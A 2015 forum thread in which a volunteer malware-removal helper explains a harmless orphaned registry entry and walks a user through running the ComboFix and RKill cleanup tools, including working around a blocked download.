Posted 03 January 2015 - 10:51 AM

Thanks for the update. That is great to hear but we are not quite finished yet.

Here are the answers to your questions and then some additional steps to take.

The Pay version of Avast? Something else?

There is no way to absolutely insulate our computers from attacks or corruption. I have used Avast Free for a long time now and have found it to suit my purposes. For right now you can continue to use what you have and when we are finished I will provide some general protection information and in light of that you can evaluate whether or not you need to pay for additional protection. Computer security is sort of an umbrella issue that not only includes Antivirus protection but there are other componenets to consider as well.

----------

The reason why the Thumbs Plus entry was included in the fix is because there is a registry entry pointing to that program but the file it is pointing to doesn't exist. In other words it is an orphaned entry. It does no harm but it does no good either. I routinely delete these types of entries.

CustomCLSID: HKU\S-1-5-21-3319101212-3949270613-1064135436-1001_Classes\CLSID\{4F8A6B95-6220-40e1-BAF6-4F2810B32428}\InprocServer32 -> C:\Audiovisual & Graphics\Thumbs Plus 8 SP1\Bin\cswshlex64.dll No File

There is no need to worry about this program. You can leave things as is or if you find a compatible version it is safe to install.

----------

Please run this next.

===================================================

Run Combofix in Vista/7

--------------------

Combofix is a very powerful tool and special attention must be taken to allow it to work properly. Please pay careful attention to the following instructions.
  • Please download ComboFix from one of these locations:

BleepingComputer
ForoSpyware

  • Save Combofix.exe to your Desktop <-- Important!!!
  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. (Click on this link to see a list of programs that should be disabled. The list is not all inclusive.)
  • Double click on Combofix.exe and follow the prompts. It is important you do not mouseclick while the program is running or it may stall.
Note #1: Often times it may appear as if ComboFix has stopped working. To verify it is still running please do one of the following below. If, based on the below, you have concluded ComboFix has stopped running please stop and advise me.
  • Check your computer clock. If it is still running then so is ComboFix
  • Open Task Manager and select the Applications Tab. If the status of AutoScan is Running, then ComboFix is running
  • Open Task Manager and select the Processes Tab. Under Image Name look for files ending in .3xe. If there are fluctuating numbers under CPU and Mem Usage then ComboFix is running
Note #2: If you receive the following error "Illegal operation attempted on a registery key that has been marked for deletion" please just restart your computer to resolve this issue

If Combofix fails to run properly using the above instructions please attempt the following:
  • Right click on the Combofix icon on your desktop and select Delete
  • Download a new copy but rename it to freshcopy.exe first, then save it to your desktop
  • Now download RKill.exe (or RKill renamed as iExplore.exe if the first one doesn't work properly) and save it to your desktop
  • Restart your computer in Safe Mode
  • Right click on RKill (or iExplore) and select Run as Administrator. If you are using Windows XP simply double click the icon
  • A black DOS screen should flash and disappear. If not, try to launch the program with the second file. If neither works please stop and let me know
  • When RKill is finished running you will be presented with a text file and a copy will be saved on your desktop. Copy and paste the contents of this report in your reply
  • Do not reboot your computer
  • Double click the freshcopy.exe icon (renamed Combofix file)
  • When finished, it will produce a log. Please copy and paste the C:\Combofix.txt log information in your next reply
  • If you disabled your antivirus please enable it again. If you uninstalled it please wait for instructions to reinstall it
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Combofix log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"For unto us a Child is born, Unto us a Son is given;"

#14 baabel

baabel
  • Topic Starter

  • Members
  • 142 posts
  • OFFLINE
  •  
  • Local time:12:28 PM

Posted 03 January 2015 - 02:22 PM

Thanks for the explanation regarding the orphaned registry entry.

 

Next: when I attempted to download ComboFix from either of the two locations I received the message:  "Your current security settings do not allow this file to be downloaded".

 

I had not yet disabled Avast Free because the instruction to do so comes after the instruction to download Combofix.



#15 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 38,196 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:28 AM

Posted 03 January 2015 - 02:35 PM

If you are using Internet Explorer try Firefox instead. If that is not the issue disable Avast then try the download.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"For unto us a Child is born, Unto us a Son is given;"




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users